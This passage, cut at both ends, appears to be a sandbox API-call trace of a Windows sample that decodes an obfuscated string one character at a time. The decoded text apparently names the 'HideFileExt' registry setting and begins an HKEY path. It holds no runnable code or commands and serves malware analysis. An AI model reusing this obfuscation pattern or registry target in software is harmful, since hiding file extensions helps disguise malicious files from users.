pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0168.506] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.506] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0168.507] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.507] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0168.508] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.508] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0168.508] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.509] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.509] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.510] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0168.510] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.511] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.516] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.517] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0168.517] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.517] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0168.518] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.518] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0168.519] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.519] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.520] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="S", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.520] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0168.520] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.521] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0168.521] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.522] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0168.522] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.523] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.523] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.524] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0168.524] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.525] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0168.525] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.525] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0168.526] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.526] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.526] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.736] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0168.737] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.737] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.737] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.738] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0168.738] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.739] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0168.739] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.740] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0168.740] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.740] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0168.741] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.741] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0168.742] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.742] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0168.743] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.748] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0168.748] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.749] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0168.749] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.750] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0168.750] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.750] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.751] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.752] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0168.752] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.752] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0168.753] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.753] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x11683e4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0168.753] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.754] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Y", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0168.754] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.755] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0168.755] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.755] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0x11683e4, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0168.756] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 